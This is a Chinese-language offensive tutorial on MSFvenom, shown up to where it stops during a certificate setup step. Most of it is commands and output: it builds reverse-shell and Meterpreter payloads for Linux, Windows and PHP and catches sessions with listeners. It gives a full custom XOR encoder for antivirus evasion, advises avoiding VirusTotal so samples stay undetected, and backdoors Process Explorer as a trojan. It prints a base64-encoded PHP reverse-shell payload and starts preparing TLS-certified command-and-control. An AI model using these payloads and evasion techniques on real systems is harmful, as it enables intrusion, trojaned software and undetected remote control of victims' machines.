簡介
到目前為止,你應該已經對MSFvenom不陌生了,因為在之前的文章中已經介紹多次了。MSFvenom是用于生成有效攻擊載荷和編碼的工具。它由msfpayload和msfencode演變而來。并于2015年6月8日取代了這兩者。
在本文中,我們将更深入地研究可用的有效載荷,了解為什麼編碼器在規避安全檢測時很有用,了解可用的可執行檔案,轉換輸出格式等等。
#1、有效載荷和載荷選項
通過檢視可用的有效載荷,我們就可以知道MSFvenom是最通用和最有用的有效載荷生成工具之一;該清單證明MSFvenom可以幫助你在幾乎任何情況下獲得會話。
要開始嘗試使用msfvenom,啟動一個終端視窗,并使用msfvenom -h或msfvenom --help來顯示幫助菜單。
# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
1、檢視所有可用載荷,使用msfvenom -l payloads
# msfvenom -l payloads
Framework Payloads (968 total) [--payload <value>]
==================================================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
.....略
2、要生成有效載荷,至少需要兩個選項,-p和-f,-p用于指定從可用的有效載荷中生成哪一個載荷。-f指定輸出格式。
msfvenom -p cmd/unix/bind_awk -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 140 bytes
awk 'BEGIN{s="/inet/tcp/4444/0/0";do{if((s|&getline c)<=0)break;if(c){while((c|&getline)>0)print $0|&s;close(c)}} while(c!="exit")close(s)}'
3、檢視所有支援的輸出格式類型,使用--list formats
msfvenom --list formats
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
axis2
dll
ducky-script-psh
elf
elf-so
exe
exe-only
....略
Framework Transform Formats [--format <value>]
==============================================
Name
----
base32
base64
bash
c
csharp
dw
dword
go
golang
....略
msfvenom支援兩種類型的格式輸出:可執行格式和轉換格式。可執行格式将生成程式和腳本,而轉換格式将隻産生有效載荷。
4、我們還可以使用-p參數指定一個-或stdin來指定自定義有效載荷,這在繞過安全檢測時非常有用:
cat payload_file.bin | msfvenom -p - -a x86 --platform linux -e x86/shikata_ga_nai -f elf -o custom.elf
生成有效載荷時,使用 -a 選項指定要使用的硬體架構(x86/x64/arm),--platform 指定有效載荷的系統平台,并使用 -o 儲存有效載荷。
5、使用msfvenom --list platforms列出支援的平台
msfvenom --list platforms
Framework Platforms [--platform <value>]
========================================
Name
----
aix
android
apple_ios
arista
brocade
bsd
bsdi
cisco
firefox
freebsd
hardware
hpux
irix
java
javascript
juniper
linux
mainframe
mikrotik
multi
netbsd
netware
nodejs
openbsd
osx
php
python
r
ruby
solaris
unifi
unix
unknown
windows
6、進行漏洞利用時,一個非常有用的選項是--smallest,可以生成盡可能小的有效載荷。
msfvenom -p linux/x64/shell_bind_tcp -f elf --smallest -o small.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 86 bytes
Final size of elf file: 206 bytes
Saved as: small.elf
7、現在我們已經了解了如何建立一個基本的正向連接配接 shell,我們将嘗試建立一個反向 shell。首先,需要檢視所選有效載荷的可用選項,可以使用 --list-options 選項:
# msfvenom -p linux/x64/shell_reverse_tcp --list-options
Options for payload/linux/x64/shell_reverse_tcp:
=========================
Name: Linux Command Shell, Reverse TCP Inline
Module: payload/linux/x64/shell_reverse_tcp
Platform: Linux
Arch: x64
Needs Admin: No
Total size: 74
Rank: Normal
Provided by:
ricky
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Advanced options for payload/linux/x64/shell_reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in its own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion options for payload/linux/x64/shell_reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
8、可用的選項非常多,暫時我們隻需要用到一些基本選項,比如監聽位址和監聽端口。使用LHOST指定監聽IP位址,使用LPORT指定監聽端口。
# msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.91.128 LPORT=1234 -f elf -o reverse.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: reverse.elf
9、為了測試我們的有效載荷,使用通用有效載荷處理程式利用子產品,在 Metasploit 的1234端口上設定我們的監聽器,
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.91.128
LHOST => 192.168.91.128
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.91.128:1234
10、運作生成的payload(有效載荷)
# chmod +x reverse.elf
# ./reverse.elf
11、如預期一樣,我們會得到一個會話。
[*] Started reverse TCP handler on 192.168.91.128:1234
[*] Sending stage (38 bytes) to 192.168.91.128
[*] Command shell session 13 opened (192.168.91.128:1234 -> 192.168.91.128:60886) at 2023-04-18 13:25:40 +0800
id
uid=0(root) gid=0(root) groups=0(root)
12、為 Windows 目标建立有效載荷同樣非常簡單;我們需要做的就是指定要使用的架構、目标平台、以及需要在目标上運作的有效載荷、監聽以及輸出格式和名稱:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -o payload.exe
13、然後在msfconsole中設定監聽,将生成的payload.exe傳輸到windows目标機上運作。不出意外的話,将會得到一個新的會話。
msf6 > handler -p windows/meterpreter/reverse_tcp -H 192.168.91.128 -P 7777
[*] Payload handler running as background job 11.
[*] Started reverse TCP handler on 192.168.91.128:7777
msf6 >
[*] Started reverse TCP handler on 192.168.91.128:7777
[*] Sending stage (179779 bytes) to 192.168.91.133
[*] Meterpreter session 1 opened (192.168.91.128:7777 -> 192.168.91.133:55489) at 2023-04-18 13:30:40 +0800
meterpreter >
通過使用 -c 或--add-code選項指定一個額外的 win32 shellcode,我們可以将多個payloads變成一個。
14、首先,建立一個簡單的有效載荷,使用windows/messagebox,在目标上彈出一個消息:
msfvenom -a x86 --platform windows -p windows/messagebox TEXT="First Payload" -f raw > First_Payload
15、然後,我們将使用-c選項将我們的第一個有效載荷添加到第二個有效載荷中:
msfvenom -c First_Payload -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -o multi.exe
─# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="First Payload" -f raw > First_Payload
No encoder specified, outputting raw payload
Payload size: 267 bytes
┌──(root㉿kali)-[/home/kali]
└─# msfvenom -c First_Payload -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -o multi.exe
Adding shellcode from First_Payload to the payload
No encoder specified, outputting raw payload
Payload size: 938 bytes
Final size of exe file: 73802 bytes
Saved as: multi.exe
16、當我們在目标機執行有效載荷時,目标機器上會彈出一個消息框,并傳回了一個新的會話
#2、編碼器
生成有效載荷隻是第一步;如今,入侵檢測系統 (IDS)、防病毒和反惡意軟體等安全産品可以輕松識别 MSFvenom 生成的 shellcode。為了幫助我們規避安全檢測,可以使用編碼器來編碼我們的 shellcode。
1、通過使用MSFconsole的show encoders選項,或者通過浏覽Kali Linux機器上的/usr/share/metasploit-framework/modules/encoders/目錄,可用檢視Metasploit架構的所有編碼器:
msf6 > show encoders
Encoders
========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 encoder/cmd/brace low No Bash Brace Expansion Command Encoder
1 encoder/cmd/echo good No Echo Command Encoder
2 encoder/cmd/generic_sh manual No Generic Shell Variable Substitution Command Encoder
....略
# ls /usr/share/metasploit-framework/modules/encoders/
cmd generic mipsbe mipsle php ppc ruby sparc x64 x86
2、要對有效載荷進行編碼,我們隻需添加 -e 選項,然後指定要使用的編碼器,使用 -i 選項指定對有效載荷進行編碼的次數:
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe -e x86/shikata_ga_nai -i 10 -o encoded.exe
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai chosen with final size 624
Payload size: 624 bytes
Final size of exe file: 73802 bytes
Saved as: encoded.exe
3、要驗證生成有效載荷是否會被防病毒軟體檢測到,我們可以使用 VirusTotal進行檢測:
非常遺憾,正如我們所料,即使我們對它進行了 10 次編碼,但仍然被大多數防病毒軟體檢測出來了。随着時間的推移, Metasploit 中的預設編碼器幾乎都能被安全軟體檢測出來。但并不代表這種方法已經失效;我們可用使用自定義編碼器,仍然可以利用 Metasploit 繞過安全産品。
4、我們将使用由 François Profizi 建立的自定義編碼器,它使用對已知明文的暴力攻擊來繞過安全産品.
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Encoder
def initialize
super(
'Name' => 'bf_xor',
'Description' => '',
'Author' => 'François Profizi',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE
)
end
def decoder_stub(state)
stub = ""
stub << "\xEB\x62\x55\x8B\xEC\x83\xEC\x18\x8B\x7D\x10\x8B\x75\x0C\x33\xC0\x89\x45\xFC\x8B"
stub << "\xC8\x83\xE1\x03\x03\xC9\x03\xC9\x03\xC9\x8B\xDA\xD3\xFB\x8A\xCB\x33\xDB\x39\x5D"
stub << "\x14\x75\x18\x0F\xB6\x1E\x0F\xB6\xC9\x33\xD9\x8B\x4D\x08\x0F\xB6\x0C\x08\x3B\xD9"
stub << "\x75\x07\xFF\x45\xFC\xEB\x02\x30\x0E\x40\x46\x3B\xC7\x7C\xC8\x3B\x7D\xFC\x74\x10"
stub << "\x83\x7D\x14\x01\x74\x06\x42\x83\xFA\xFF\x72\xAF\x33\xC0\xEB\x02\x8B\xC2\xC9\xC3"
stub << "\x55\x8B\xEC\x83\xEC\x10\xEB\x50\x58\x89\x45\xFC\xEB\x37\x58\x8B\x10\x89\x55\xF8"
stub << "\x83\xC0\x04\x89\x45\xF4\x33\xDB\x33\xC0\x50\x6A\x0A\xFF\x75\xFC\xFF\x75\xF4\xE8"
stub << "\x72\xFF\xFF\xFF\x85\xC0\x74\x13\x6A\x01\xFF\x75\xF8\xFF\x75\xFC\xFF\x75\xF4\xE8"
stub << "\x5E\xFF\xFF\xFF\xFF\x65\xFC\xC9\xC3\xE8\xC4\xFF\xFF\xFF"
stub << [state.buf.length].pack("L") # size payload
stub << state.buf[0,10]
stub << "\xE8\xAB\xFF\xFF\xFF"
return stub
end
def encode_block(state, block)
key = rand(4294967295)
encoded = ""
key_tab = [key].pack('L<')
i=0
block.unpack('C*').each do |ch|
octet = key_tab[i%4]
t = ch.ord ^ octet.ord
encoded += t.chr
i+=1
end
return encoded
end
end
将其放置到/usr/share/metasploit-framework/modules/encoders/x86目錄,并儲存為bf_xor.rb。
5、然後使用這個編碼器對我們的payload進行編碼
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f exe-only -e x86/bf_xor -o bf_xor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/bf_xor
x86/bf_xor succeeded with size 547 (iteration=0)
x86/bf_xor chosen with final size 547
Payload size: 547 bytes
Final size of exe-only file: 73802 bytes
Saved as: bf_xor.exe
#其他
在測試有效載荷時,我們不應該使用線上掃描器,如VirusTotal。他們會與防毒軟體供應商和安全公司分享樣本,以便他們能夠改進他們的服務和産品。這就是為什麼在測試你的有效載荷時,你應該對你的目标進行适當的偵察,确定目标使用的安全解決方案,然後在虛拟機上安裝對應的産品,禁用用戶端遙測送出,測試你的有效載荷。這裡以火絨和360 total security為例,使用自定義的bf_xor編碼器,成功繞過了它們的檢測:
#3、輸出格式
現在我們已經學會了msfvenom的基本用法,讓我們來探索一些可用的輸出格式。在本章的開頭,我們用--list formats選項列出了所有可用的輸出格式;現在我們将重點讨論一些不同的類型和選項。
我們先來看看dll的輸出格式以及如何使用它。DLL是動态連結庫的縮寫,是微軟對共享庫概念的實作,這意味着它們是可以被導入到應用程式中的函數庫。
1、首先,我們使用dll輸出格式生成有效載荷并設定監聽。
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.91.128 LPORT=7777 -f dll -o inject.dll
[*] exec: msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.91.128 LPORT=7777 -f dll -o inject.dll
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 643 bytes
Final size of dll file: 9216 bytes
Saved as: inject.dll
msf6 > handler -p windows/meterpreter/reverse_https -H 192.168.91.128 -P 7777
[*] Payload handler running as background job 13.
msf6 >
2、與可執行檔案不同,我們需要使用另一個應用程式來加載我們的DLL有效載荷。在這個例子中,我們将使用 rundll32.exe 來加載DLL并運作我們的 shellcode。要加載DLL,使用rundll32.exe,後面我們建立的DLL,以及入口點名稱main:
msf6 >
[*] Started HTTPS reverse handler on https://192.168.91.128:7777
[!] https://192.168.91.128:7777 handling request from 192.168.91.133; (UUID: fry53rqp) Without a database connected that payload UUID tracking will not work!
[*] https://192.168.91.128:7777 handling request from 192.168.91.133; (UUID: fry53rqp) Staging x86 payload (176732 bytes) ...
[!] https://192.168.91.128:7777 handling request from 192.168.91.133; (UUID: fry53rqp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 17 opened (192.168.91.128:7777 -> 192.168.91.133:57240) at 2023-04-18 14:57:45 +0800
msf6 >
正如我們所料,我們使用DLL 載荷獲得一個新會話。
MSFvenom 可以幫助我們建立具有隐身功能的有效載荷,利用進階 shell,例如 meterpreter,并在執行 Web 應用程式滲透測試時使用編碼器。
3、要使用 Base64 編碼建立 PHP Meterpreter 有效載荷,可以使用以下指令:
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -f raw -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1510 (iteration=0)
php/base64 chosen with final size 1510
Payload size: 1510 bytes
eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguOTEuMTI4JzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
4、設定監聽,在php中執行測試。
msf6 > handler -p php/meterpreter/reverse_tcp -H 192.168.91.128 -P 7777
[*] Payload handler running as background job 1.
5、在php互動式shell中執行,獲得一個新的會話
root@osboxes:~# php -a
Interactive mode enabled
php > eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguOTEuMTI4JzsgJHBvcnQgPSA3Nzc3OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
msf6 >
[*] Sending stage (39927 bytes) to 192.168.91.136
[*] Meterpreter session 33 opened (192.168.91.128:7777 -> 192.168.91.136:45948) at 2023-04-18 15:37:14 +0800
#4、模闆
例如,當你已經在内部網絡上并獲得對内部軟體庫的通路權時,對已知的應用程式進行後門攻擊可以是一個破壞目标的好方法。此外,通過使用自定義模闆,可能能夠繞過一些使用預設模闆檢測Metasploit有效載荷的安全解決方案。
MSFvenom預設使用/usr/share/metasploit-framework/data/templates目錄中的模闆,但我們可以選擇使用自己的模闆,使用-x選項指定模闆檔案。
1、使用-x選項,可以指定模闆;在這個示例中,我們将使用Windows Sysinternals的Process Explorer作為模闆,并通過使用-k選項,保留模闆檔案原行為,并将有效載荷作為一個新程序注入:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.128 LPORT=7777 -x procexp.exe -k -f exe -o procexp-backdoored.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 7832576 bytes
Saved as: procexp-backdoored.exe
2、當受害者運作有效載荷時,原本的程式會正常運作,後門會作為原程式的附加程序運作。
[*] Sending stage (175686 bytes) to 192.168.91.133
[*] Meterpreter session 35 opened (192.168.91.128:7777 -> 192.168.91.133:50134) at 2023-04-18 16:32:46 +0800
tips:當用自定義x64模闆建立x64有效載荷時,應該使用exe-only作為輸出格式,而不是exe。
#5、使用受信任證書的Meterpreter載荷
現在大多數安全解決方案還會通過分析進出目标機器的流量來進行網絡入侵檢測。在這種情況下,很可能即使使用編碼器繞過了防病毒軟體,但有效載荷也會在嘗試連接配接到我們的偵聽器時被捕獲和攔截。
首先需要準備一台雲主機,和一個域名。并使用 Let's Encrypt 擷取SSL證書。
首先在域名管理商設定DNS域名指向(這裡不做示範)
tips:使用國内雲主機/域名服務商,需要備案才能解析域名,可以使用香港或者國外雲主機和域名服務商
1、在雲伺服器商安裝letsencrypt
apt install letsencrypt -y
2、接下來,生成證書,請運作letsencrypt 指令,并按照說明進行操作
letsencrypt certonly --manual -d gpt5.onl
root@iZj6ccx9c36agbjm7ekf9mZ:~# letsencrypt certonly --manual -d gpt5.onl
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Enter email address (used for urgent renewal and security notices)
(Enter 'c' to cancel): [email protected] //輸入郵箱
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Please read the Terms of Service at
https://letsencrypt.org/documents/LE-SA-v1.3-September-21-2022.pdf. You must
agree in order to register with the ACME server. Do you agree?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(Y)es/(N)o: Y //同意協定,輸入Y
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Would you be willing, once your first certificate is successfully issued, to
share your email address with the Electronic Frontier Foundation, a founding
partner of the Let's Encrypt project and the non-profit organization that
develops Certbot? We'd like to send you email about our work encrypting the web,
EFF news, campaigns, and ways to support digital freedom.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(Y)es/(N)o: N //是否共享郵箱,選N
Account registered.
Requesting a certificate for gpt5.onl
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Create a file containing just this data:
T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss.a7_kMa1Et_Zx_p1td4C3YkGUV2qWL7zEYzWZQvki65c
And make it available on your web server at this URL:
http://gpt5.onl/.well-known/acme-challenge/T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Press Enter to Continue //按上述方式設定檔案内容,然後回車。
Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/gpt5.onl/fullchain.pem
Key is saved at: /etc/letsencrypt/live/gpt5.onl/privkey.pem
This certificate expires on 2023-07-18.
These files will be updated when the certificate renews.
NEXT STEPS:
- This certificate will not be renewed automatically. Autorenewal of --manual certificates requires the use of an authentication hook script (--manual-auth-hook) but one was not provided. To renew this certificate, repeat this same certbot command before the certificate's expiry date.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
If you like Certbot, please consider supporting our work by:
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
* Donating to EFF: https://eff.org/donate-le
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
root@iZj6ccx9c36agbjm7ekf9mZ:~#
tips: 可以使用python啟動一個簡易http服務,用于證書驗證
root@iZj6ccx9c36agbjm7ekf9mZ:~# cd /tmp/ root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# mkdir -p ./.well-known/acme-challenge/ root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# echo "T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss.a7_kMa1Et_Zx_p1td4C3YkGUV2qWL7zEYzWZQvki65c" >> ./.well-known/acme-challenge/T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
生成的證書在/etc/letsencrypt/live/yourdomain/目錄下:
